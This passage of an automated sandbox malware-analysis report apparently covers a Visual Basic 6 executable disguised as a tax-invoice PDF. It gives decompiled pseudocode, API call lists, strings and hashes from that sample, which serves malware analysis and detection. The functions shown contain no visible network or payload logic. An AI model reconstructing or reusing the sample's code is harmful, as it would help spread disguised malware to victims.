0x00417b3a
0x00417b3f
0x00417b44
0x00417b44
0x00417b68
0x00417b6c
0x00417b71
0x00417b80
0x00417b83
0x00417b85
0x00417b8c
0x00417ba5
0x00417b8e
0x00417b8e
0x00417b90
0x00417b95
0x00417b98
0x00417b9b
0x00417ba0
0x00417ba0
0x00417bac
0x00417bb2
0x00417bb2
0x00417bb7
0x00417bb8
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00417A4D
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00417A73
#557.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00417A7C
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00417A93
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00417AB8
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?), ref: 00417AE5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117C8,00000180,?,?,?,?,?), ref: 00417B16
__vbaFreeObj.MSVBVM60(?,?,?,?,?), ref: 00417B27
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,?), ref: 00417B3F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?), ref: 00417B6C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004119C4,00000078,?,?,?,?,?,?,?), ref: 00417B9B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?), ref: 00417BB2

Strings

4-4-4, xrefs: 00417A5F

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckHresultNew2$#557Chkstk
String ID: 4-4-4
API String ID: 2286932286-3794238894
Opcode ID: ac153c35ff2d18b36ace40b729e73c80b607216f629c07bdba364df343d21355
Instruction ID: 23c6a63761abc4f5acab6d003aa89cd6a1e0ecd5e437ba07921a5780be325b13
Opcode Fuzzy Hash: ac153c35ff2d18b36ace40b729e73c80b607216f629c07bdba364df343d21355
Instruction Fuzzy Hash: DE41EC70905209EFDB10DFD1C849BEDBBB8FF08718F14452AE101B72A0DB796986DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00418388, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00418388(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v24;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				void* _v80;
				signed int _v84;
				intOrPtr* _v92;
				signed int _v96;
				signed int _t35;
				signed int _t39;
				char* _t43;
				intOrPtr _t55;
				intOrPtr* _t68;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t68;
				_t35 = 0x4c;
				L004014B0();
				_v12 = _t68;
				_v8 = 0x401420;
				L00401642();
				L00401648();
				_push(_t35);
				_push(L"undervognsbehandlings");
				L0040164E();
				asm("sbb eax, eax");
				_v80 =  ~( ~_t35 + 1);
				L0040165A();
				_t39 = _v80;
				if(_t39 == 0) {
					if( *0x41a010 != 0) {
						_v92 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v92 = 0x41a010;
					}
					_t55 =  *((intOrPtr*)( *_v92));
					_t43 =  &_v28;
					L0040169C();
					_v80 = _t43;
					_v68 = 0x80020004;
					_v76 = 0xa;
					_v52 = 0x80020004;
					_v60 = 0xa;
					_v36 = 0x80020004;
					_v44 = 0xa;
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *_t68 =  *0x401418;
					_t39 =  *((intOrPtr*)( *_v80 + 0x1cc))(_v80, _t55, 0x10, 0x10, 0x10, _t43,  *((intOrPtr*)(_t55 + 0x374))( *_v92));
					asm("fclex");
					_v84 = _t39;
					if(_v84 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x1cc);
						_push(0x4117b8);
						_push(_v80);
						_push(_v84);
						L00401690();
						_v96 = _t39;
					}
					L0040168A();
				}
				asm("wait");
				_push(0x4184f7);
				return _t39;
			}

0x0041838d
0x00418398
0x00418399
0x004183a2
0x004183a3
0x004183ab
0x004183ae
0x004183b5
0x004183bf
0x004183c4
0x004183c5
0x004183ca
0x004183d1
0x004183d6
0x004183dd
0x004183e2
0x004183e8
0x004183f6
0x00418410
0x004183f8
0x004183f8
0x004183fd
0x00418402
0x00418407
0x00418407
0x00418421
0x0041842b
0x0041842f
0x00418434
0x00418437
0x0041843e
0x00418445
0x0041844c
0x00418453
0x0041845a
0x00418464
0x0041846e
0x0041846f
0x00418470
0x00418471
0x00418475
0x0041847f
0x00418480
0x00418481
0x00418482
0x00418486
0x00418490
0x00418491
0x00418492
0x00418493
0x0041849b
0x004184a6
0x004184ac
0x004184ae
0x004184b5
0x004184d1
0x004184b7
0x004184b7
0x004184bc
0x004184c1
0x004184c4
0x004184c7
0x004184cc
0x004184cc
0x004184d8
0x004184d8
0x004184dd
0x004184de
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 004183A3
#669.MSVBVM60(?,?,?,?,004014B6), ref: 004183B5
__vbaStrMove.MSVBVM60(?,?,?,?,004014B6), ref: 004183BF
__vbaStrCmp.MSVBVM60(undervognsbehandlings,00000000,?,?,?,?,004014B6), ref: 004183CA
__vbaFreeStr.MSVBVM60(undervognsbehandlings,00000000,?,?,?,?,004014B6), ref: 004183DD
__vbaNew2.MSVBVM60(00411D38,0041A010,undervognsbehandlings,00000000,?,?,?,?,004014B6), ref: 00418402
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,undervognsbehandlings), ref: 0041842F
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,undervognsbehandlings), ref: 00418464
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,undervognsbehandlings), ref: 00418475
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,undervognsbehandlings), ref: 00418486
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117B8,000001CC,?,?,00000000), ref: 004184C7
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 004184D8

Strings

undervognsbehandlings, xrefs: 004183C5

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Chkstk$Free$#669CheckHresultMoveNew2
String ID: undervognsbehandlings
API String ID: 3068271998-11411429
Opcode ID: 8b460dd4d754492e6ab72d3c68c0206097bc0246731c0de25629357bff868d9a
Instruction ID: b98fef03de0927e889d900a9b253a2b93cdc771a3ac0b32cb95b29459ab2ae01
Opcode Fuzzy Hash: 8b460dd4d754492e6ab72d3c68c0206097bc0246731c0de25629357bff868d9a
Instruction Fuzzy Hash: 79415E709406099BDB01DFE1C846BDEBBB5BF09714F10452EF501BB2A1DBBE54818B59

Uniqueness

Uniqueness Score: -1.00%

Function 00414E1F, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00414E1F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v52;
				void* _v72;
				signed int _v76;
				intOrPtr* _v84;
				signed int _v88;
				char* _t37;
				char* _t42;
				signed int _t45;
				intOrPtr _t66;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_push(0x44);
				L004014B0();
				_v12 = _t66;
				_v8 = 0x401218;
				_v52 = 1;
				_t37 =  &_v52;
				_push(_t37);
				L004015EE();
				_v72 =  ~(0 | _t37 != 0x0000ffff);
				L00401636();
				if(_v72 != 0) {
					_push(0);
					_push(L"Klint");
					_push( &_v52);
					L004015E8();
					_push(0x10);
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v24);
					L00401660();
					L00401636();
				}
				if( *0x41a010 != 0) {
					_v84 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v84 = 0x41a010;
				}
				_t42 =  &_v36;
				L0040169C();
				_v72 = _t42;
				_t45 =  *((intOrPtr*)( *_v72 + 0x1ac))(_v72, _t42,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x37c))( *_v84));
				asm("fclex");
				_v76 = _t45;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x41181c);
					_push(_v72);
					_push(_v76);
					L00401690();
					_v88 = _t45;
				}
				L0040168A();
				_v32 = 0x44790400;
				_v28 = 0x5afc;
				_push(0x414f64);
				L0040168A();
				return _t45;
			}

0x00414e24
0x00414e2f
0x00414e30
0x00414e37
0x00414e3a
0x00414e42
0x00414e45
0x00414e4c
0x00414e53
0x00414e56
0x00414e57
0x00414e67
0x00414e6e
0x00414e79
0x00414e7b
0x00414e7d
0x00414e85
0x00414e86
0x00414e8b
0x00414e8e
0x00414e98
0x00414e99
0x00414e9a
0x00414e9b
0x00414e9c
0x00414e9e
0x00414ea1
0x00414ea9
0x00414ea9
0x00414eb5
0x00414ecf
0x00414eb7
0x00414eb7
0x00414ebc
0x00414ec1
0x00414ec6
0x00414ec6
0x00414eea
0x00414eee
0x00414ef3
0x00414efe
0x00414f04
0x00414f06
0x00414f0d
0x00414f29
0x00414f0f
0x00414f0f
0x00414f14
0x00414f19
0x00414f1c
0x00414f1f
0x00414f24
0x00414f24
0x00414f30
0x00414f35
0x00414f3c
0x00414f43
0x00414f5e
0x00414f63

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00414E3A
#560.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,004014B6), ref: 00414E57
__vbaFreeVar.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,004014B6), ref: 00414E6E
#716.MSVBVM60(00000001,Klint,00000000,00000001,?,?,?,?,?,?,?,?,?,004014B6), ref: 00414E86
__vbaChkstk.MSVBVM60(00000001,Klint,00000000,00000001,?,?,?,?,?,?,?,?,?,004014B6), ref: 00414E8E
__vbaLateIdSt.MSVBVM60(?,00000000,00000001,Klint,00000000,00000001,?,?,?,?,?,?,?,?,?,004014B6), ref: 00414EA1
__vbaFreeVar.MSVBVM60(?,00000000,00000001,Klint,00000000,00000001,?,?,?,?,?,?,?,?,?,004014B6), ref: 00414EA9
__vbaNew2.MSVBVM60(00411D38,0041A010,00000001,?,?,?,?,?,?,?,?,?,004014B6), ref: 00414EC1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00000001), ref: 00414EEE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041181C,000001AC,?,?,?,?,?,?,?,00000001), ref: 00414F1F
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00000001), ref: 00414F30
__vbaFreeObj.MSVBVM60(00414F64,?,?,?,?,?,?,?,00000001), ref: 00414F5E

Strings

Klint, xrefs: 00414E7D

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$Chkstk$#560#716CheckHresultLateNew2
String ID: Klint
API String ID: 3748626564-1944180061
Opcode ID: 8e9eb62ea36d8df8be0374e11031cbacf94031bdf469d3828797c3f9d8f4d36c
Instruction ID: fcfe8842390bb768bf78f4122d0c6ac0d173faca8718c6ea73ae18d0a9ad5f71
Opcode Fuzzy Hash: 8e9eb62ea36d8df8be0374e11031cbacf94031bdf469d3828797c3f9d8f4d36c
Instruction Fuzzy Hash: 7B310C70910218ABDB10EFD1CD46FEEB7B8BF49704F24052AF101BB2A1D7BD59468B59

Uniqueness

Uniqueness Score: -1.00%

Function 00415F06, Relevance: 21.1, APIs: 14, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00415F06(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				signed int _v44;
				intOrPtr _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _t71;
				signed int _t76;
				char* _t81;
				signed int _t85;
				intOrPtr _t105;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t105;
				_push(0x4c);
				L004014B0();
				_v12 = _t105;
				_v8 = 0x4012e0;
				L00401684();
				if( *0x41a31c != 0) {
					_v80 = 0x41a31c;
				} else {
					_push(0x41a31c);
					_push(0x411788);
					L00401696();
					_v80 = 0x41a31c;
				}
				_v56 =  *_v80;
				_t71 =  *((intOrPtr*)( *_v56 + 0x14))(_v56,  &_v36);
				asm("fclex");
				_v60 = _t71;
				if(_v60 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411778);
					_push(_v56);
					_push(_v60);
					L00401690();
					_v84 = _t71;
				}
				_v64 = _v36;
				_t76 =  *((intOrPtr*)( *_v64 + 0x60))(_v64,  &_v32);
				asm("fclex");
				_v68 = _t76;
				if(_v68 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x411900);
					_push(_v64);
					_push(_v68);
					L00401690();
					_v88 = _t76;
				}
				_v76 = _v32;
				_v32 = _v32 & 0x00000000;
				L00401648();
				L0040168A();
				if( *0x41a010 != 0) {
					_v92 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v92 = 0x41a010;
				}
				_t81 =  &_v36;
				L0040169C();
				_v56 = _t81;
				_v44 = _v44 & 0x00000000;
				_v52 = 2;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t85 =  *((intOrPtr*)( *_v56 + 0x1b8))(_v56, 0x10, _t81,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x318))( *_v92));
				asm("fclex");
				_v60 = _t85;
				if(_v60 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x41181c);
					_push(_v56);
					_push(_v60);
					L00401690();
					_v96 = _t85;
				}
				L0040168A();
				_push(0x4160c7);
				L0040165A();
				L0040165A();
				return _t85;
			}

0x00415f0b
0x00415f16
0x00415f17
0x00415f1e
0x00415f21
0x00415f29
0x00415f2c
0x00415f39
0x00415f45
0x00415f5f
0x00415f47
0x00415f47
0x00415f4c
0x00415f51
0x00415f56
0x00415f56
0x00415f6b
0x00415f7a
0x00415f7d
0x00415f7f
0x00415f86
0x00415f9f
0x00415f88
0x00415f88
0x00415f8a
0x00415f8f
0x00415f92
0x00415f95
0x00415f9a
0x00415f9a
0x00415fa6
0x00415fb5
0x00415fb8
0x00415fba
0x00415fc1
0x00415fda
0x00415fc3
0x00415fc3
0x00415fc5
0x00415fca
0x00415fcd
0x00415fd0
0x00415fd5
0x00415fd5
0x00415fe1
0x00415fe4
0x00415fee
0x00415ff6
0x00416002
0x0041601c
0x00416004
0x00416004
0x00416009
0x0041600e
0x00416013
0x00416013
0x00416037
0x0041603b
0x00416040
0x00416043
0x00416047
0x00416051
0x0041605b
0x0041605c
0x0041605d
0x0041605e
0x00416067
0x0041606d
0x0041606f
0x00416076
0x00416092
0x00416078
0x00416078
0x0041607d
0x00416082
0x00416085
0x00416088
0x0041608d
0x0041608d
0x00416099
0x0041609e
0x004160b9
0x004160c1
0x004160c6

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00415F21
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00415F39
__vbaNew2.MSVBVM60(00411788,0041A31C,?,?,?,?,004014B6), ref: 00415F51
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,00000014), ref: 00415F95
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411900,00000060), ref: 00415FD0
__vbaStrMove.MSVBVM60 ref: 00415FEE
__vbaFreeObj.MSVBVM60 ref: 00415FF6
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 0041600E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041603B
__vbaChkstk.MSVBVM60(?,00000000), ref: 00416051
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041181C,000001B8), ref: 00416088
__vbaFreeObj.MSVBVM60 ref: 00416099
__vbaFreeStr.MSVBVM60(004160C7), ref: 004160B9

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$CheckFreeHresult$ChkstkNew2$CopyMove
String ID:
API String ID: 1989687073-0
Opcode ID: b6df6245922b273b2ec91c94679c09a7d746a9c50274042f4570dd1367c99ccc
Instruction ID: a6299189e6dc108f35124ba0c4bcbb3073669780c0a89f5b44c2cd7a5731e3f6
Opcode Fuzzy Hash: b6df6245922b273b2ec91c94679c09a7d746a9c50274042f4570dd1367c99ccc
Instruction Fuzzy Hash: 0851E370901208EFCB00EFD1D889BEEBBB5BF08715F20442AF501BB2A1C7B95985DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004181AA, Relevance: 21.1, APIs: 14, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E004181AA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				char* _t58;
				signed int _t62;
				char* _t66;
				signed int _t70;
				void* _t86;
				void* _t88;
				intOrPtr _t89;
				signed int _t93;

				_t89 = _t88 - 0xc;
				 *[fs:0x0] = _t89;
				L004014B0();
				_v16 = _t89;
				_v12 = 0x401408;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x4014b6, _t86);
				if( *0x41a010 != 0) {
					_v68 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v68 = 0x41a010;
				}
				_t58 =  &_v32;
				L0040169C();
				_v52 = _t58;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_v52 + 0x1fc))(_v52, 0x10, _t58,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x32c))( *_v68));
				asm("fclex");
				_v56 = _t62;
				if(_v56 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1fc);
					_push(0x4117fc);
					_push(_v52);
					_push(_v56);
					L00401690();
					_v72 = _t62;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v76 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v76 = 0x41a010;
				}
				_t66 =  &_v32;
				L0040169C();
				_v52 = _t66;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t70 =  *((intOrPtr*)( *_v52 + 0x1fc))(_v52, 0x10, _t66,  *((intOrPtr*)( *((intOrPtr*)( *_v76)) + 0x380))( *_v76));
				asm("fclex");
				_v56 = _t70;
				_t93 = _v56;
				if(_t93 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x1fc);
					_push(0x4117fc);
					_push(_v52);
					_push(_v56);
					L00401690();
					_v80 = _t70;
				}
				L0040168A();
				asm("fldz");
				L00401528();
				L004015E2();
				asm("fcomp qword [0x401400]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t93 != 0) {
					_push(0x40);
					L0040156A();
					_v28 = _t70;
				}
				asm("wait");
				_push(0x418369);
				return _t70;
			}

0x004181ad
0x004181bc
0x004181c6
0x004181ce
0x004181d1
0x004181d8
0x004181e7
0x004181f1
0x0041820b
0x004181f3
0x004181f3
0x004181f8
0x004181fd
0x00418202
0x00418202
0x00418226
0x0041822a
0x0041822f
0x00418232
0x00418239
0x00418243
0x0041824d
0x0041824e
0x0041824f
0x00418250
0x00418259
0x0041825f
0x00418261
0x00418268
0x00418284
0x0041826a
0x0041826a
0x0041826f
0x00418274
0x00418277
0x0041827a
0x0041827f
0x0041827f
0x0041828b
0x00418297
0x004182b1
0x00418299
0x00418299
0x0041829e
0x004182a3
0x004182a8
0x004182a8
0x004182cc
0x004182d0
0x004182d5
0x004182d8
0x004182df
0x004182e9
0x004182f3
0x004182f4
0x004182f5
0x004182f6
0x004182ff
0x00418305
0x00418307
0x0041830a
0x0041830e
0x0041832a
0x00418310
0x00418310
0x00418315
0x0041831a
0x0041831d
0x00418320
0x00418325
0x00418325
0x00418331
0x00418336
0x00418338
0x0041833d
0x00418342
0x00418348
0x0041834a
0x0041834b
0x0041834d
0x0041834f
0x00418354
0x00418354
0x00418357
0x00418358
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 004181C6
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 004181FD
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041822A
__vbaChkstk.MSVBVM60(?,00000000), ref: 00418243
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117FC,000001FC), ref: 0041827A
__vbaFreeObj.MSVBVM60(00000000,?,004117FC,000001FC), ref: 0041828B
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 004182A3
__vbaObjSet.MSVBVM60(?,00000000), ref: 004182D0
__vbaChkstk.MSVBVM60(?,00000000), ref: 004182E9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117FC,000001FC), ref: 00418320
__vbaFreeObj.MSVBVM60(00000000,?,004117FC,000001FC), ref: 00418331
_CIsin.MSVBVM60(00000000,?,004117FC,000001FC), ref: 00418338
__vbaFpR8.MSVBVM60(00000000,?,004117FC,000001FC), ref: 0041833D
#569.MSVBVM60(00000040), ref: 0041834F

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2$#569Isin
String ID:
API String ID: 3633085554-0
Opcode ID: c021d5fcf4b354ca52b4c669e3fecbcedb8adab04a5d8507479ef8bc95c5d4a8
Instruction ID: 9626f2bb97181ef6e4f7996252c369bd0f7b9275860c43cbd9837c6d6ab0d4b0
Opcode Fuzzy Hash: c021d5fcf4b354ca52b4c669e3fecbcedb8adab04a5d8507479ef8bc95c5d4a8
Instruction Fuzzy Hash: 1A516A70D01608EFCB01EFA4D849BDEBBB5BF09704F24486AF501BB2A1CBB95941DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00417BEC, Relevance: 19.7, APIs: 13, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00417BEC(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0) {
				intOrPtr _v8;
				long long* _v12;
				void* _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v40;
				char _v48;
				intOrPtr _v56;
				char _v64;
				char _v72;
				char _v80;
				void* _v100;
				signed int _v104;
				intOrPtr _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				char* _t65;
				signed int _t69;
				signed int _t76;
				signed int _t82;
				char* _t88;
				long long* _t98;
				signed int _t101;
				long long _t106;

				_t106 = __fp0;
				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_push(0x70);
				L004014B0();
				_v12 = _t98;
				_v8 = 0x4013c8;
				if( *0x41a010 != 0) {
					_v116 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v116 = 0x41a010;
				}
				_t65 =  &_v32;
				L0040169C();
				_v100 = _t65;
				_v72 = 0x80020004;
				_v80 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t69 =  *((intOrPtr*)( *_v100 + 0x1b0))(_v100, 0x10, _t65,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x360))( *_v116));
				asm("fclex");
				_v104 = _t69;
				_t101 = _v104;
				if(_t101 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x4117d8);
					_push(_v100);
					_push(_v104);
					L00401690();
					_v120 = _t69;
				}
				_t88 =  &_v32;
				L0040168A();
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0x80020004;
				_v48 = 0xa;
				_push( &_v64);
				_push( &_v48);
				asm("fld1");
				_push(_t88);
				_push(_t88);
				_v64 = _t106;
				asm("fld1");
				_push(_t88);
				_push(_t88);
				_v72 = _t106;
				asm("fld1");
				_push(_t88);
				_push(_t88);
				_v80 = _t106;
				asm("fld1");
				_push(_t88);
				_push(_t88);
				 *_t98 = _t106;
				L00401570();
				L004015E2();
				asm("fcomp qword [0x4013c0]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t101 == 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_v124 = 1;
				}
				_v100 =  ~_v124;
				_push( &_v64);
				_push( &_v48);
				_push(2);
				L00401666();
				_t76 = _v100;
				if(_t76 != 0) {
					if( *0x41a31c != 0) {
						_v128 = 0x41a31c;
					} else {
						_push(0x41a31c);
						_push(0x411788);
						L00401696();
						_v128 = 0x41a31c;
					}
					_v100 =  *_v128;
					_t82 =  *((intOrPtr*)( *_v100 + 0x48))(_v100, 0x2f,  &_v28);
					asm("fclex");
					_v104 = _t82;
					if(_v104 >= 0) {
						_v132 = _v132 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x411778);
						_push(_v100);
						_push(_v104);
						L00401690();
						_v132 = _t82;
					}
					_t76 = _v28;
					_v112 = _t76;
					_v28 = _v28 & 0x00000000;
					L00401648();
				}
				asm("wait");
				_push(0x417df4);
				L0040165A();
				return _t76;
			}

0x00417bec
0x00417bf1
0x00417bfc
0x00417bfd
0x00417c04
0x00417c07
0x00417c0f
0x00417c12
0x00417c20
0x00417c3a
0x00417c22
0x00417c22
0x00417c27
0x00417c2c
0x00417c31
0x00417c31
0x00417c55
0x00417c59
0x00417c5e
0x00417c61
0x00417c68
0x00417c72
0x00417c7c
0x00417c7d
0x00417c7e
0x00417c7f
0x00417c88
0x00417c8e
0x00417c90
0x00417c93
0x00417c97
0x00417cb3
0x00417c99
0x00417c99
0x00417c9e
0x00417ca3
0x00417ca6
0x00417ca9
0x00417cae
0x00417cae
0x00417cb7
0x00417cba
0x00417cbf
0x00417cc6
0x00417ccd
0x00417cd4
0x00417cde
0x00417ce2
0x00417ce3
0x00417ce5
0x00417ce6
0x00417ce7
0x00417cea
0x00417cec
0x00417ced
0x00417cee
0x00417cf1
0x00417cf3
0x00417cf4
0x00417cf5
0x00417cf8
0x00417cfa
0x00417cfb
0x00417cfc
0x00417cff
0x00417d04
0x00417d09
0x00417d0f
0x00417d11
0x00417d12
0x00417d1d
0x00417d14
